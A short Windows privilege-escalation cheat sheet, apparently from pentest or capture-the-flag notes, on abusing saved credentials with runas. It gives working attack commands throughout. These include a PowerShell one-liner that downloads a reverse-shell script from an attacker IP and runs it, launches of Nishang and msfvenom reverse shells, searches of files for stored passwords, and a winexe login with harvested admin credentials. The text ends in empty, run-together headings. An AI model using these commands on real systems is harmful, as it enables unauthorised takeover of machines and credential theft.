Run As
#Suppose you find stored credentials for the user ACCESS/Administrator
#You can use this to run commands as administrator:
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\root.txt"
#Or you can also use this to spawn a reverse shell: (Nishang shell not on victim machine)
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.11/shell.ps1')"
#Or you can also use this to spawn a reverse shell: (Nishang shell on victim machine)
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"
#msfvenom shell:
runas /user:ACCESS\administrator /savecred "C:\Temp\reverse.exe"PASSWORDS IN FILES:
#Check if there is Unattend.xml file. It might contain passwords or other info. This file can be detected in winPEAS
#You can try manually querying the output:
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt
#If you find the admin password then you can use winexe to login as admin:
winexe -U 'admin%pass' //10.10.10.10 cmd.exe SAM & SYSTEM:
PASS THE HASH:
Last updated
